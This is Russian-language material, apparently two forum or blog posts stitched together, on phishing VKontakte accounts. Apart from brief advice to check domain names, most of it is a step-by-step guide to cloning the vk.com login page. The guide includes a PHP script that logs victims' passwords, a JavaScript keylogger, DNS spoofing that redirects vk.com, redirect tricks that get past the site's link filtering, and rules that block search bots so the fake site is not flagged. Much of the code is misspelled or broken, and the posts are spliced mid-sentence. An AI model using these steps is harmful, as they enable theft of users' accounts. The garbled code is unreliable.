В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.
Что такое фишинг?Вообще слово fishing переводится как рыбалка. Фишинг – это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.
Будьте внимательнымиКак вам могут подсунуть такой сайт, есть пару примеров.
И еще куча вариантов, как можно заманить жертву на такой вот сайт.
Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать. Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.
Создание фишинг сайтаДанный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.
И так приведу пример создания фишингового сайта для социальной сети вконтакте.
Открываем любой браузер, заходим по адресу vk.com,
Имя файла: index.html
Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.
Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php
Открываем блокнот и вставляем туда этот код.
$Login = $_POST; // Логин жертвы
$Pass = $_POST[‘zena’]; // Пароль жертвы
$log = fopen(“ups.php”,”a+”); //тут будут лежать пароли жертв
fwrite($log,”
$Login:$Pass \n”); //производим запись в ups.php
fclose($log); //закрывает ups.php
echo “”; // перенаправляем жертву на http://vk.com
Закрываем и сохраняем как icq.php
Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим
В keyloger.js вводим:
Document.onkeypres = funcion(evt) { evt = evt || window.evnt key = String.fromCharode(evt.charode) if (key) { var http = new XMLHtpRequest(); var parm = encodeURI(key) http.open("POST","keylogger.php",true); http.setReqestHeder("Contnt-type","aplication/x-ww-form-urlenoded"); http.send("key="+parm); } }
в наш index.php надо добавить строку:
Готово, мы сделали keylogger .
Теперь приступаем к редактированию index.php : ищем строчку «Log in » и ищем параметр onclick=’top.showBox’ (меняем адрес на https://vk.com )
После этого при нажатии на кнопку Log in пользователь будет направлен на официальный сайт ВКонтакте .
Входим через SSH на VPS .
# wget htps://thesprwl.org/media/projcts/dnscef-0.3.zip # unzip dnscef-0.3.zip # cd dnshef* # chod 755 *.py
Лучшим решением будет таким, что лучше всего здесь поставить следующие параметры:
# pi instal dnslib # pi instal IPy
Создаём файл: hosts.txt
В него пишем следующее:
(URL-адрес сайта, в нашем случае vk.com=IP_ВАШЕГО_VPS )
Прописывая следующу команду, мы всё запустим:
./dnschf.py -i 0.0.0.0 --logfle=log.txt --file=hosts.txt
Готово, ваш DNS успешно работает. Он возвращает наши адреса нам.
На этом всё, мы надеемся данная статья была полезной для вас.
С уважением, команда HelpU .
Отказ от ответственности : Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.Приветствую, обитатели форума! Сегодня речь пойдет о фишинге Вконтакте. Прежде всего хочу сказать, что в статье упоминаются некоторые сервисы, не сочтите за рекламу. Статья написана для ознакомления и я никого на описанные в статье действия не побуждаю.
Как вы знаете фишинг ВК был очень популярен, но после обновления ВКонтакте политики безопасности стал исчерпывать себя. Так ли это на самом деле? Ведь ничто не стоит на месте и с новой политикой безопасности пришли и новые методы фишинга.
В данной статье я расскажу немного о "проблемах" фиш-сайта ВК и их решениях на примере давно слитого в паблик, сайта. (Исходники можно скачать тут: Я.Диск
Что же первое бросается в глаза при открытии такого сайта?
Вы должны быть зарегистрированы, чтобы видеть ссылки.
И получи 100500$". Ну согласитесь звучит глупо. Но да, на такое ведутся до сих пор...такого наивного народа осталось очень мало и в основном это дети.
Вы должны быть зарегистрированы, чтобы видеть ссылки.
Что только портило внешний вид сообщения.
Спойлер: Махинации с uCoz
Создадим любой сайт с названием, подходящим под вашу тематику сайта-прокладки
Перейдем во вкладку Модули и создадим страничку сайта
Обзовем ее как-нибудь, я назову "test", если у вас есть сайт-прокладка типа голосовалки, вы можете назвать страницу "golos-za-ivana-pupkina"
Теперь перейдем на наш сайт, затем на вкладку "test", которую только что создали и скопируем куда-нибудь URL
Перейдем в раздел Дизайн => Редактор => Страницы сайта...и между
вставим следующие строки:
location.replace("http://сайт, куда нужен редирект");
Вы должны быть зарегистрированы, чтобы видеть ссылки.
Нас перекинет на нужный нам сайт. Теперь нет необходимости сокращать через vk.cc подобного рода ссылки. ВК их без проблем пропустит, а мы при рассылки лишим себя вопросов от получателя "Ой, какая-то ссылка подозрительная...это точно не обман?".
Спойлер: Получаем SSL сертификат
На данный момент существуют множество хостингов, работающих с центрами сертификации. Самое простое решение вопроса с SSL - это разворачивать свои сайты, как раз на таких хостингах. В их панели управления уже есть вкладка с управлением SSL, там можно заказать новый сертификат, установить свой или управлять существующими сертификатами.
Так же, чтобы снизить вероятность блокировки сайта с пометкой как мошеннический можно прописать в файл.htaccess запрет на индексацию ботами поисковых механизмов.
Спойлер: Что прописать в.htaccess
SetEnvIfNoCase User-Agent "^Googlebot" search_bot
SetEnvIfNoCase User-Agent "^Yandex" search_bot
SetEnvIfNoCase User-Agent "^Yahoo" search_bot
SetEnvIfNoCase User-Agent "^Aport" search_bot
SetEnvIfNoCase User-Agent "^msnbot" search_bot
SetEnvIfNoCase User-Agent "^spider" search_bot
SetEnvIfNoCase User-Agent "^Robot" search_bot
SetEnvIfNoCase User-Agent "^php" search_bot
SetEnvIfNoCase User-Agent "^Mail" search_bot
SetEnvIfNoCase User-Agent "^bot" search_bot
SetEnvIfNoCase User-Agent "^igdeSpyder" search_bot
SetEnvIfNoCase User-Agent "^Snapbot" search_bot
SetEnvIfNoCase User-Agent "^WordPress" search_bot
SetEnvIfNoCase User-Agent "^BlogPulseLive" search_bot
SetEnvIfNoCase User-Agent "^Parser" search_bot